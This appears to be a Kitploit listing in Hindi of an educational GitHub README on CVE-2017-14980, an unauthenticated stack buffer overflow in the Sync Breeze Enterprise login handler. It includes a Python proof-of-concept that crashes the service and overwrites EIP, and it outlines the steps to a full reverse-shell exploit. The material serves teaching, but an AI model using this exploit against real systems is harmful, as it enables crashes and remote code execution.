Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2017-14980 — Sync Breeze Enterprise 10.0.28 में /login हैंडलर के माध्यम से पहुंचने योग्य स्टैक-आधारित बफर ओवरफ्लो, यह प्रदर्शित करता है कि कैसे अनियंत्रित इनपुट लंबाई स्टैक मेमोरी को दूषित कर सकती है। | Kitploit
उपकरण/GitHubGitHub/themalwareguardian/cve-2017-14980
भेद्यता विश्लेषणशोषणरिवर्स इंजीनियरिंगशेलकोडवेब एप्लिकेशन शोषणडीबगर्सफज़िंगलर्निंग और शिक्षापेलोड डेवलपमेंट
बाइनरी शोषण
GitHubthemalwareguardian/cve-2017-14980

CVE-2017-14980

Sync Breeze Enterprise 10.0.28 में /login हैंडलर के माध्यम से पहुंचने योग्य स्टैक-आधारित बफर ओवरफ्लो, यह प्रदर्शित करता है कि कैसे अनियंत्रित इनपुट लंबाई स्टैक मेमोरी को दूषित कर सकती है।

रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🐞 CVE-2017-14980: Sync Breeze Enterprise 10.0.28 - स्टैक-आधारित बफर अतिप्रवाह

Sync Breeze Enterprise 10.0.28 में /login हैंडलर के माध्यम से पहुँचने योग्य स्टैक-आधारित बफर अतिप्रवाह, यह प्रदर्शित करता है कि कैसे अनियंत्रित इनपुट लंबाई स्टैक मेमोरी को दूषित कर सकती है।




📑 विषय सूची

  • यह रिपॉजिटरी क्यों मौजूद है
  • यह भेद्यता क्यों दिलचस्प है
  • संदर्भ और प्रभावित सॉफ्टवेयर
  • भेद्यता के बारे में
  • क्रैश को ट्रिगर करना
  • शोषण



🎓 यह रिपॉजिटरी क्यों मौजूद है

यह रिपॉजिटरी उस सामग्री का हिस्सा है जिसका उपयोग मैं मेमोरी भ्रष्टाचार शोषण सिखाते समय करता हूँ (अपने नियमित कार्य के अतिरिक्त, मैं विभिन्न साइबर सुरक्षा पाठ्यक्रमों में भी पढ़ाता हूँ जहाँ मैं रिवर्स इंजीनियरों की अगली पीढ़ी को प्रशिक्षित करने में मदद करता हूँ)।

CVE-2017-14980 एक ऐसा मामला है जिसका उपयोग मैं तब करता हूँ जब मैं चाहता हूँ कि छात्र कच्चे TCP प्रोटोकॉल के बजाय HTTP पर एक वेनिला EIP अधिलेखन का अनुभव करें। यह पहली नज़र में सरल लगता है, एक लॉगिन फॉर्म, एक लंबा पासवर्ड, एक क्रैश, लेकिन HTTP संदर्भ खराब वर्णों का एक सेट पेश करता है जो तुरंत स्पष्ट नहीं होते हैं और छात्रों को यह सोचने के लिए मजबूर करते हैं कि डेटा को असुरक्षित बफर तक पहुँचने से पहले कैसे संसाधित किया जा रहा है। यह समझना कि %, &, +, और = यहाँ खराब वर्ण क्यों हैं, URL एन्कोडिंग को समझने की आवश्यकता है, जो अपने आप में एक उपयोगी सबक है।




💡 यह भेद्यता क्यों दिलचस्प है

Sync Breeze Enterprise एक Windows फ़ाइल सिंक्रनाइज़ेशन एप्लिकेशन है जो एक वेब प्रबंधन इंटरफ़ेस प्रदर्शित करता है। भेद्यता लॉगिन हैंडलर में है, जो पासवर्ड फ़ील्ड को बिना लंबाई सत्यापन के एक निश्चित आकार के स्टैक बफर में कॉपी करता है। यह मामला शिक्षण के लिए क्या उपयोगी बनाता है:

  • कोई प्रमाणीकरण आवश्यक नहीं। कोई भी क्रेडेंशियल जाँच होने से पहले लॉगिन प्रसंस्करण के दौरान अतिप्रवाह होता है।
  • प्रत्यक्ष EIP अधिलेखन। कोई SEH, कोई हीप, कोई बहु-चरणीय शोषण नहीं। सहेजा गया रिटर्न पता सीधे अधिलेखित हो जाता है।
  • HTTP संदर्भ गैर-स्पष्ट खराब वर्ण पेश करता है। सामान्य \x00, \x0a, और \x0d के अलावा, application/x-www-form-urlencoded सामग्री प्रकार \x25 (%), \x26 (&), \x2b (+), और \x3d (=) को खराब वर्णों के रूप में जोड़ता है क्योंकि सर्वर इसे बफर में कॉपी करने से पहले URL-एन्कोडेड बॉडी को डिकोड करता है। जो छात्र खराब वर्ण विश्लेषण को छोड़ देते हैं और सीधे शेलकोड पर जाते हैं, उन्हें एक पेलोड मिलेगा जो मेमोरी तक पहुँचने से पहले चुपचाप दूषित हो जाता है।
  • एप्लिकेशन के साथ शिप किए गए मॉड्यूल में एक विश्वसनीय गैजेट। Sync Breeze के साथ बंडल किया गया libspp.dll, ASLR, SafeSEH, या CFG के बिना संकलित किया गया था, जिससे गैजेट का पता रीबूट के दौरान स्थिर रहता है।



🔍 संदर्भ और प्रभावित सॉफ्टवेयर

Sync Breeze Enterprise एक Windows फ़ाइल सिंक्रनाइज़ेशन उपकरण है जिसमें दूरस्थ प्रबंधन के लिए एक अंतर्निहित वेब सर्वर शामिल है। वेब इंटरफ़ेस सक्षम होने पर TCP पोर्ट 80 पर सुनता है और /login पर एक लॉगिन फॉर्म प्रदर्शित करता है। भेद्यता POST हैंडलर में है जो पासवर्ड फ़ील्ड को संसाधित करता है।

मुख्य तकनीकी विवरण:

  • भेद्यता प्रकार: स्टैक-आधारित बफर अतिप्रवाह
  • प्रभावित संस्करण: Sync Breeze Enterprise 10.0.28
  • प्रभावित एंडपॉइंट: POST /login, पासवर्ड पैरामीटर
  • असुरक्षित घटक: लॉगिन फॉर्म हैंडलर
  • आवश्यक प्रमाणीकरण: नहीं
  • प्रभाव: दूरस्थ कोड निष्पादन



⚠️ भेद्यता के बारे में

Sync Breeze POST बॉडी को पढ़कर और पासवर्ड फ़ील्ड निकालकर लॉगिन फॉर्म को संसाधित करता है। मान को बिना लंबाई जाँच के एक निश्चित आकार के स्टैक बफर में कॉपी किया जाता है। असुरक्षित तर्क का एक सरलीकृत संस्करण इस प्रकार दिखता है:

root@kitploit:~
char password_buffer[256];

strcpy(password_buffer, password_field);

कॉपी होने से पहले POST बॉडी URL-डिकोड की जाती है, जिसका अर्थ है कि %25 जैसे वर्ण बफर तक पहुँचने से पहले % में डिकोड हो जाते हैं। यही कारण है कि कुछ URL-विशेष वर्ण खराब वर्णों के रूप में कार्य करते हैं, वे डेटा के असुरक्षित कॉपी ऑपरेशन तक पहुँचने से पहले HTTP परत द्वारा व्याख्या किए जाते हैं। पर्याप्त लंबा पासवर्ड मान भेजने से कॉपी बफर के अंत से आगे लिखती है, जिससे सहेजा गया रिटर्न पता अधिलेखित हो जाता है। जब फ़ंक्शन वापस आता है, तो CPU स्टैक से हमलावर-नियंत्रित मान को EIP में लोड करता है और उस पर कूद जाता है।




💥 क्रैश को ट्रिगर करना

/login पर POST अनुरोध में एक अत्यधिक बड़ा पासवर्ड भेजकर क्रैश को दोहराया जा सकता है। किसी प्रमाणीकरण की आवश्यकता नहीं है। Python का उपयोग करके उदाहरण:

root@kitploit:~
import socket

HOST = '127.0.0.1'
PORT = 80

payload = b"A" * 600

body = b"username=admin&password=" + payload
request = (
	b"POST /login HTTP/1.1\r\n"
	b"Host: 127.0.0.1\r\n"
	b"Content-Type: application/x-www-form-urlencoded\r\n"
	b"Content-Length: " + str(len(body)).encode() + b"\r\n"
	b"Connection: close\r\n"
	b"\r\n" +
	body
)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(request)
s.close()
टूल डाउनलोड करें

जब डीबगर के तहत निष्पादित किया जाता है, तो क्रैश उपयोगकर्ता-नियंत्रित डेटा के साथ अधिलेखित EIP दिखाता है:

root@kitploit:~
EIP = 41414141

यह पुष्टि करता है कि सहेजा गया रिटर्न पता अतिप्रवाह के कारण दूषित हो गया है।




💣 शोषण

इस रिपॉजिटरी का उद्देश्य केवल क्रैश प्रदर्शित करना नहीं है, बल्कि पूर्ण शोषण प्रक्रिया को चरण दर चरण, फज़िंग से लेकर कार्यशील रिवर्स शेल तक, समझाना है।

मुख्य README को साफ रखने के लिए, विस्तृत शोषण नोट्स, स्क्रिप्ट्स और डीबगर चरण इस रिपॉजिटरी के Vulnerability 📂 फ़ोल्डर में रखे गए हैं।

वहाँ आपको इस CVE का शोषण करने के लिए उपयोग किए जाने वाले पूर्ण कार्यप्रवाह मिलेगा, जिसमें शामिल हैं:

  • क्रैश की पहचान करने के लिए पासवर्ड फ़ील्ड का फज़िंग।
  • स्टैक पर EIP का सटीक स्थान खोजने के लिए ऑफसेट खोज।
  • URL-एन्कोडेड POST बॉडी के लिए खराब वर्ण विश्लेषण, जिसमें HTTP-विशिष्ट खराब वर्ण शामिल हैं।
  • libspp.dll में JMP ESP गैजेट का पता लगाना, एक मॉड्यूल जो ASLR या SafeSEH के बिना संकलित किया गया है।
  • शेलकोड प्लेसमेंट और निष्पादन।